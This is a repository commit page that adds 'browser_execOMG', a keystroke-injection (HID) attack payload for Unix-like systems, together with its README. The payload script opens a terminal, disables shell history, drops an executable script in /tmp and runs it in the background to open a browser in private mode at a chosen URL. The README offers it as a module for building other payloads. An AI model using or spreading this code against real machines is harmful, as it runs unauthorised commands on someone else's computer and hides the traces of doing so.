hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

uploading browser_execOMG payload 

A payload which finds installed browser in target's system and searches URL in it. This payload can be used as a module to craft a new payload which requires browser execution in it.
pull/190/head
drapl0n 2023-07-09 19:51:59 +05:30 committed by GitHub
parent 0d27c643be
commit 146743ef64
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 46 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
payloads/library/execution/browser_execOMG/README.md Normal file
View File

@ -0,0 +1,24 @@
## About:
# Title: browser_execOMG
# Description: browser_execOMG finds browser installed in target's system and searche URL in it.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution.
# Target: Unix-like operating systems.
# Attackmodes: HID
## browser_execOMG: A payload which finds installed browser in target's system and searches URL in it. This payload can be used as a module to craft a new payload which requires browser execution in it.
### Workflow:
1. Executing Terminal Emulator.
2. Prevent storing history.
3. Storing script in target's system.
4. Granting execution privilege.
5. Executing script in background.
### Usage:
* Replace URL at line `15` in `payload.txt` with URL you want to search for.
#### Support me if you like my work:
* https://twitter.com/drapl0n

22
payloads/library/execution/browser_execOMG/payload.txt Normal file
View File

@ -0,0 +1,22 @@
REM Title: browser_execOMG
REM Description: browser_execOMG finds browser installed in target's system and searche URL in it.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Execution.
REM Target: Unix-like operating systems.
REM Attackmodes: HID
DELAY 1000
CTRL ALT t
DELAY 500
STRING unset HISTFILE
ENTER
DELAY 100
STRING echo -e "url=hak5.org \n#\!/bin/bash\nfunction browser(){\n\tbrowser=\$(ls /bin/ | grep -Ew 'firefox|chromium|brave'| head -1)\n\tif [ \"\$browser\" = firefox ]; then\n\t\texecBrowser=\$(echo \$browser --private-window)\n\t\texport execBrowser\n\telif [ \"\$browser\" = chromium ]; then\n\t\texecBrowser=\$(echo \$browser --incognito)\n\t\texport execBrowser\n\telif [ \"\$browser\" = brave ]; then\n\t\texecBrowser=\$(echo \$browser --incognito)\n\t\texport execBrowser\n\telse\n\t\techo \"Browser not found.\"\n\tfi\n}\nbrowser\n\$execBrowser \$url " > /tmp/sys
ENTER
DELAY 200
STRING chmod +x /tmp/sys
ENTER
DELAY 200
STRING /tmp/./sys & disown && exit
ENTER